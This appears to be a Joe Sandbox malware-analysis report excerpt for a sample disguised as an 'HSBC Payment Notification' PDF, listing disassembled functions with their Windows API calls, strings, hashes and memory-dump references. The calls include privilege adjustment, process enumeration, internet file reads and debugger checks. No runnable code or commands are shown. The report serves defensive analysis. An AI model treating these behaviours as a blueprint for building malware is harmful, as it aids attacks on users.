Associated: 00000001.00000002.1384539494.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384539494.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384659636.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384711603.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384837186.00000000004EE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384930493.00000000004F5000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd

Similarity

API ID: CreateInitializeInstanceUninitialize_memmove
String ID: .lnk
API String ID: 2683427295-24824748
Opcode ID: 2168bc15797479d4bf9d8be8a874f14214ce5ae81521c48187290a1a744f77cd
Instruction ID: adb56a4b7a52abdaef05598002f92e73435f728c8d9d90c66f29e414dbdf6fe1
Opcode Fuzzy Hash: 2168bc15797479d4bf9d8be8a874f14214ce5ae81521c48187290a1a744f77cd
Instruction Fuzzy Hash: 5AA14AB1104205AFD700EF55C881EAFB7E8EF85308F00492EF595972A2EB75EE09CB56

Function 00404B37 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,?,00404AD0), ref: 00404B45
GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00404B57

Strings

GetNativeSystemInfo, xrefs: 00404B51
kernel32.dll, xrefs: 00404B40

Memory Dump Source

Source File: 00000001.00000002.1384053665.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1383950704.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384539494.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384539494.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384659636.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384711603.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384837186.00000000004EE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384930493.00000000004F5000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: GetNativeSystemInfo$kernel32.dll
API String ID: 2574300362-192647395
Opcode ID: a73fa7ec54199ac5cd1cc7a5405e6f37b5fe8d156d6918c0c451661c08ead94f
Instruction ID: eac2b9657e48c1354d3ce07b29e145d4c0a45f8badf8df95cafcbf2a1bd35060
Opcode Fuzzy Hash: a73fa7ec54199ac5cd1cc7a5405e6f37b5fe8d156d6918c0c451661c08ead94f
Instruction Fuzzy Hash: 8ED01274A10713CFD720AF31D818B0A76E4AF45751B218C3F9485D6690D678F8C4C75C

Function 009A0A10 Relevance: 6.3, APIs: 2, Strings: 1, Instructions: 1012COMMON

Download Yara Rule

Strings

t~u|, xrefs: 009ACE12

Memory Dump Source

Source File: 00000001.00000002.1385260628.0000000000990000.00000040.00001000.00020000.00000000.sdmp, Offset: 00990000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_990000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd

Similarity

API ID:
String ID: t~u|
API String ID: 0-2425167145
Opcode ID: e340916f867e837b397643ad337b0076e847662cc563213a84874c7093955eb9
Instruction ID: df476cab41b98860fd422e8a11f97d2d22a34282a8bc505b64a69f88ff8a70a8
Opcode Fuzzy Hash: e340916f867e837b397643ad337b0076e847662cc563213a84874c7093955eb9
Instruction Fuzzy Hash: 55629D6190F3805FCF3586288C45A767B6C6BE3728F4D459AE4978ACF3E6659C04C2E2

Function 0047EE0D Relevance: 6.2, APIs: 4, Instructions: 164processCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32 ref: 0047EE3D
Process32FirstW.KERNEL32(00000000,?), ref: 0047EE4B

Part of subcall function 00407DE1: _memmove.LIBCMT ref: 00407E22

Process32NextW.KERNEL32(00000000,?), ref: 0047EF0B
CloseHandle.KERNEL32(00000000,?,?,?), ref: 0047EF1A

Memory Dump Source

Source File: 00000001.00000002.1384053665.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1383950704.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384539494.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384539494.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384659636.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384711603.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384837186.00000000004EE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384930493.00000000004F5000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd

Similarity

API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32_memmove
String ID:
API String ID: 2576544623-0
Opcode ID: 89fde9512b94cb07eafd2aa5ff05997a94c0a9f5672a7c8b2447530929707f10
Instruction ID: a98c0e68db7b9d45d0fd814aff1298f869d04e0007e226020b87bcf654703779
Opcode Fuzzy Hash: 89fde9512b94cb07eafd2aa5ff05997a94c0a9f5672a7c8b2447530929707f10
Instruction Fuzzy Hash: BB519171504300AFD310EF21CC85EABB7E8EF88714F10492EF595A72A1DB34AD08CB96

Function 009CF080 Relevance: 6.1, APIs: 2, Strings: 1, Instructions: 848COMMON

Download Yara Rule

Strings

pow, xrefs: 009CF185, 009CF1A2

Memory Dump Source

Source File: 00000001.00000002.1385260628.0000000000990000.00000040.00001000.00020000.00000000.sdmp, Offset: 00990000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_990000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd

Similarity

API ID:
String ID: pow
API String ID: 0-2276729525
Opcode ID: af578b2d979319f777b08975f53e6625d9fad8bcfa4980a99de88a195733a33b
Instruction ID: 7f2cfec8274ec7fc158595af271d43302b1a257c994f59686f321edfa0f64caf
Opcode Fuzzy Hash: af578b2d979319f777b08975f53e6625d9fad8bcfa4980a99de88a195733a33b
Instruction Fuzzy Hash: B3522631D69F414DD7235634D972339679DAFA63C0F14C73BE816B9AAAEB38C8835102

Function 009BE570 Relevance: 6.0, Strings: 2, Instructions: 3450COMMON

Download Yara Rule

Strings

VUUU, xrefs: 009BDF32
VUUU, xrefs: 009BE037, 009BE167

Memory Dump Source

Source File: 00000001.00000002.1385260628.0000000000990000.00000040.00001000.00020000.00000000.sdmp, Offset: 00990000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_990000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd

Similarity

API ID:
String ID: VUUU$VUUU
API String ID: 0-3149182767
Opcode ID: c9168171f9ce53e23beb9e6878a07ab3ff2a764f8dcb01c0e833c19bae5c1658
Instruction ID: ae792dfa36866f96c3d8d475a87b1f0b3fa2494aefd3c6be6df75cbccf2b19d5
Opcode Fuzzy Hash: c9168171f9ce53e23beb9e6878a07ab3ff2a764f8dcb01c0e833c19bae5c1658
Instruction Fuzzy Hash: D4637272A087408FC738CF1CCA517DAFBE6AFD9324F09892DE59997355D774A8048B82

Function 0045E616 Relevance: 5.1, APIs: 1, Strings: 2, Instructions: 561stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(?,?,?,00000000), ref: 0045E628

Strings

|, xrefs: 0045E658
(, xrefs: 0045E66E

Memory Dump Source

Source File: 00000001.00000002.1384053665.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1383950704.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384539494.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384539494.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384659636.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384711603.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384837186.00000000004EE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384930493.00000000004F5000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd

Similarity

API ID: lstrlen
String ID: ($|
API String ID: 1659193697-1631851259
Opcode ID: e4b6563495775eced85f6639daf36049b9172e9dced26037dbca7602620842ae
Instruction ID: d66d97c7bb63d5e7dad9b567a4e3f94d41a6da7275ee88609bc8c1bec3a8e44c
Opcode Fuzzy Hash: e4b6563495775eced85f6639daf36049b9172e9dced26037dbca7602620842ae
Instruction Fuzzy Hash: 21322675A007059FD728CF2AC481A6AB7F0FF48310B15C56EE89ADB3A2E774E941CB44

Function 004722EE Relevance: 4.7, APIs: 3, Instructions: 164networkfileCOMMON

Download Yara Rule

APIs

InternetQueryDataAvailable.WININET(00000001,?,00000000,00000000,00000000,?,?,?,?,?,?,?,?,0047180A,00000000), ref: 004723E1
InternetReadFile.WININET(00000001,00000000,00000001,00000001), ref: 00472418

Memory Dump Source

Source File: 00000001.00000002.1384053665.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1383950704.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384539494.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384539494.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384659636.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384711603.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384837186.00000000004EE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384930493.00000000004F5000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd

Similarity

API ID: Internet$AvailableDataFileQueryRead
String ID:
API String ID: 599397726-0
Opcode ID: e7707af6f25208033fda62ebdde61bcb9e23fc8501fea6a1bf99df50b1f9224e
Instruction ID: 97e6fa55f52fdedc64eb36c533065f345fcd4e8e1beeb73d4f24c64f527f6271
Opcode Fuzzy Hash: e7707af6f25208033fda62ebdde61bcb9e23fc8501fea6a1bf99df50b1f9224e
Instruction Fuzzy Hash: 0941DA71604205BFEB20DE65DE81EFB77BCEB40314F10806FFA49A6241DABC9E419658

Function 009D08F1 Relevance: 4.6, APIs: 3, Instructions: 78COMMONLIBRARYCODE

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 009D09E9
SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 009D09F3
UnhandledExceptionFilter.KERNEL32(-00000328,?,?,?,?,?,00000000), ref: 009D0A00

Memory Dump Source

Source File: 00000001.00000002.1385260628.0000000000990000.00000040.00001000.00020000.00000000.sdmp, Offset: 00990000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_990000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd

Similarity

API ID: ExceptionFilterUnhandled$DebuggerPresent
String ID:
API String ID: 3906539128-0
Opcode ID: ed38644c0c3a917e60e54960c2d025b703f5a30400a4e6b6a13e012140286b86
Instruction ID: c68f4238ddd3838df761cd6f46b49eecf0508ad6f037cfda7a0c91f71a9ea81d
Opcode Fuzzy Hash: ed38644c0c3a917e60e54960c2d025b703f5a30400a4e6b6a13e012140286b86
Instruction Fuzzy Hash: 9831D375D5132C9BCB21DF24D88878CBBB8AF58310F5081EAE41CA6261E7309F818F45

Function 004587E1 Relevance: 4.6, APIs: 3, Instructions: 67COMMON

Download Yara Rule

APIs

Part of subcall function 00420DB6: std::exception::exception.LIBCMT ref: 00420DEC
Part of subcall function 00420DB6: __CxxThrowException@8.LIBCMT ref: 00420E01

LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0045882B
AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00458858
GetLastError.KERNEL32 ref: 00458865

Memory Dump Source

Source File: 00000001.00000002.1384053665.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1383950704.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384539494.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384539494.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384659636.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384711603.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384837186.00000000004EE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384930493.00000000004F5000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd

Similarity

API ID: AdjustErrorException@8LastLookupPrivilegePrivilegesThrowTokenValuestd::exception::exception
String ID:
API String ID: 1922334811-0
Opcode ID: a92a6e461037143895f69c145384908288df5c64050873de664138e79dc066f9
Instruction ID: 5e41a7b511489fb1457012ee205441660039eb57adee2e696ecce50f3e5e177b
Opcode Fuzzy Hash: a92a6e461037143895f69c145384908288df5c64050873de664138e79dc066f9
Instruction Fuzzy Hash: 7511BFB2514204AFE718EFA4EC85D2BB7F8EB05315B60852EF85593212EF34BC448B64

Function 0045874B Relevance: 4.5, APIs: 3, Instructions: 43memoryCOMMON

Download Yara Rule

APIs

AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 00458774
CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 0045878B
FreeSid.ADVAPI32(?), ref: 0045879B

Memory Dump Source

Source File: 00000001.00000002.1384053665.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1383950704.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384539494.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384539494.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384659636.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384711603.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384837186.00000000004EE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384930493.00000000004F5000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd

Similarity

API ID: AllocateCheckFreeInitializeMembershipToken
String ID:
API String ID: 3429775523-0
Opcode ID: 008726f0c27652ffd03f151f72c22d205906185045b9f325022e2ab268aa6496
Instruction ID: 222101879978235e3db2a0a583f2c1bf244a93baf2b2f2d6b5292d8d16c370cf
Opcode Fuzzy Hash: 008726f0c27652ffd03f151f72c22d205906185045b9f325022e2ab268aa6496
Instruction Fuzzy Hash: 4CF04F7591130CBFDF00DFF4DC89AAEB7BCEF09201F104879A901E2181D7756A088B54

Function 009D34CD Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(00000003,?,009D34A3,00000003,009ECE80,0000000C,009D35CD,00000003,00000002,00000000,?,009D15C8,00000003), ref: 009D34EE
TerminateProcess.KERNEL32(00000000,?,009D34A3,00000003,009ECE80,0000000C,009D35CD,00000003,00000002,00000000,?,009D15C8,00000003), ref: 009D34F5
ExitProcess.KERNEL32 ref: 009D3507

Memory Dump Source

Source File: 00000001.00000002.1385260628.0000000000990000.00000040.00001000.00020000.00000000.sdmp, Offset: 00990000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_990000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd

Similarity

API ID: Process$CurrentExitTerminate
String ID:
API String ID: 1703294689-0
Opcode ID: ec45c0046675dd714169d62d13fe7cd1e7ef18baaf2252d945d72990e354afc2
Instruction ID: b5317dcc5b13c5f12c3ceed370eb8978a2d5ae589db9183a5453b135bc1a0620
Opcode Fuzzy Hash: ec45c0046675dd714169d62d13fe7cd1e7ef18baaf2252d945d72990e354afc2
Instruction Fuzzy Hash: 2EE04F31099109ABCF017F24DC09A583B29FB41382B08C416F94546231CB35DE82DB80

Function 00468889 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 68COMMON

Download Yara Rule

APIs

__time64.LIBCMT ref: 0046889B

Part of subcall function 0042520A: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,00468F6E,00000000,?,?,?,?,0046911F,00000000,?), ref: 00425213
Part of subcall function 0042520A: __aulldiv.LIBCMT ref: 00425233

Strings

0eL, xrefs: 00468892

Memory Dump Source

Source File: 00000001.00000002.1384053665.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1383950704.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384539494.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384539494.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384659636.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384711603.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384837186.00000000004EE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384930493.00000000004F5000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd

Similarity

API ID: Time$FileSystem__aulldiv__time64
String ID: 0eL
API String ID: 2893107130-3167399643
Opcode ID: 173a61627ebe1b4304b39b54128586dabbe463c8e4c1c1e482927ec7599268c1
Instruction ID: 2c57299538d283c5d644ae0a39161a0e0d0ec28ce0c746f6c7e9e831f8b60585
Opcode Fuzzy Hash: 173a61627ebe1b4304b39b54128586dabbe463c8e4c1c1e482927ec7599268c1
Instruction Fuzzy Hash: B421AF326256108BC729CF29D841A52B3E1EFA5311B698F6DD0F5CB2C0DA38A905CB58

Function 0046C6D1 Relevance: 3.1, APIs: 2, Instructions: 52fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?), ref: 0046C6FB
FindClose.KERNEL32(00000000), ref: 0046C72B

Memory Dump Source

Source File: 00000001.00000002.1384053665.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1383950704.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384539494.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384539494.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384659636.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384711603.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384837186.00000000004EE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384930493.00000000004F5000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd

Similarity

API ID: Find$CloseFileFirst
String ID:
API String ID: 2295610775-0
Opcode ID: 45c62872381a6feff6d223480115480bdbba5ccbc8d99e64919f1b60502656e7
Instruction ID: b4b64e4e0be63edce78860a78e1dfdfe78961efcf08952f795b51eb70efe8952
Opcode Fuzzy Hash: 45c62872381a6feff6d223480115480bdbba5ccbc8d99e64919f1b60502656e7
Instruction Fuzzy Hash: 411152726106049FDB10EF29D88592AF7E5EF85325F00C52EF9A5D7391DB34AC05CB85

Function 0046A06A Relevance: 3.0, APIs: 2, Instructions: 31windowCOMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(00000000,?,00000FFF,00000000,00000016,?,00479468,?,0048FB84,?), ref: 0046A097
FormatMessageW.KERNEL32(00001000,00000000,000000FF,00000000,?,00000FFF,00000000,00000016,?,00479468,?,0048FB84,?), ref: 0046A0A9

Memory Dump Source

Source File: 00000001.00000002.1384053665.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1383950704.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384539494.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384539494.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384659636.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384711603.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384837186.00000000004EE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384930493.00000000004F5000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd

Similarity

API ID: ErrorFormatLastMessage
String ID:
API String ID: 3479602957-0
Opcode ID: aedf4ef7b819e7061a1d9f91078b4e07f1c96d427ff214e73d92c0d6c6dea44e
Instruction ID: 2c9db32d3ae4548df1de74cdb7d607b6943671b75e71bd67b23ca617ca970478
Opcode Fuzzy Hash: aedf4ef7b819e7061a1d9f91078b4e07f1c96d427ff214e73d92c0d6c6dea44e
Instruction Fuzzy Hash: D8F0823550522DABDB21AFA4CC48FEE776CBF08361F00416AF909E6191DA349954CBA6

Function 004581CB Relevance: 3.0, APIs: 2, Instructions: 22COMMON

Download Yara Rule

APIs

AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00458309), ref: 004581E0
CloseHandle.KERNEL32(?,?,00458309), ref: 004581F2

Memory Dump Source

Source File: 00000001.00000002.1384053665.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1383950704.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384539494.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384539494.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384659636.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384711603.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384837186.00000000004EE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384930493.00000000004F5000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd

Similarity

API ID: AdjustCloseHandlePrivilegesToken
String ID:
API String ID: 81990902-0
Opcode ID: 9ec38f7879727ea9b1300892ff3550b9fff1aaeeeffd9baaebef182c4f9d335e
Instruction ID: 9bafbd08ffd8acbbb2d026fb6ea58a2c51283803ccb0941fee12b6a17b14d6d6
Opcode Fuzzy Hash: 9ec38f7879727ea9b1300892ff3550b9fff1aaeeeffd9baaebef182c4f9d335e
Instruction Fuzzy Hash: 13E04632000620AEE7212B61FC08D777BEAEB04314720882EB8A680431CF22AC90DB18

Function 0042A155 Relevance: 3.0, APIs: 2, Instructions: 8COMMONLIBRARYCODE

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(00000000,00494178,00428D57,00493E50,?,?,00000001), ref: 0042A15A
UnhandledExceptionFilter.KERNEL32(?,?,?,00000001), ref: 0042A163

Memory Dump Source

Source File: 00000001.00000002.1384053665.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1383950704.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384539494.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384539494.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384659636.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384711603.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384837186.00000000004EE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384930493.00000000004F5000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: c2bfc4d91f5eef072ecd4d4a99461c52a82975f392c39b974fa7ca05b3ef40fa
Instruction ID: 9da78fce3b57c7d2137df8720d13279edd616241823e717daaa40eb201d223bb
Opcode Fuzzy Hash: c2bfc4d91f5eef072ecd4d4a99461c52a82975f392c39b974fa7ca05b3ef40fa
Instruction Fuzzy Hash: CCB09231254308ABCA022B91EC09B8C3F68EB46AA2F404434FA0D84C60CB6254548B99

Function 004EECC8 Relevance: 2.7, Strings: 2, Instructions: 181COMMON

Download Yara Rule

Strings

::1, xrefs: 004EED5C
7=t>, xrefs: 004EEE9F

Memory Dump Source

Source File: 00000001.00000002.1384837186.00000000004EE000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1383950704.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384053665.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384539494.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384539494.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384659636.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384711603.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384930493.00000000004F5000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd

Similarity

API ID:
String ID: 7=t>$::1
API String ID: 0-44347883
Opcode ID: 478236d57c07943dd3545631c92c599fb99e3c37ab518bc2b85201fbec801ba2
Instruction ID: 12970b61b9c0779da4ac66ada2de1fd2a2a2fc677c8e1fb4110fee1eb95078c7
Opcode Fuzzy Hash: 478236d57c07943dd3545631c92c599fb99e3c37ab518bc2b85201fbec801ba2
Instruction Fuzzy Hash: 0451CE319897C59FDF228AB888953D67FA3AF472183DA00DBC4C04E05BD62595C7CB4B

Function 0043242E Relevance: 1.8, APIs: 1, Instructions: 294COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1384053665.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1383950704.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384539494.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384539494.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384659636.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384711603.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384837186.00000000004EE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384930493.00000000004F5000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd

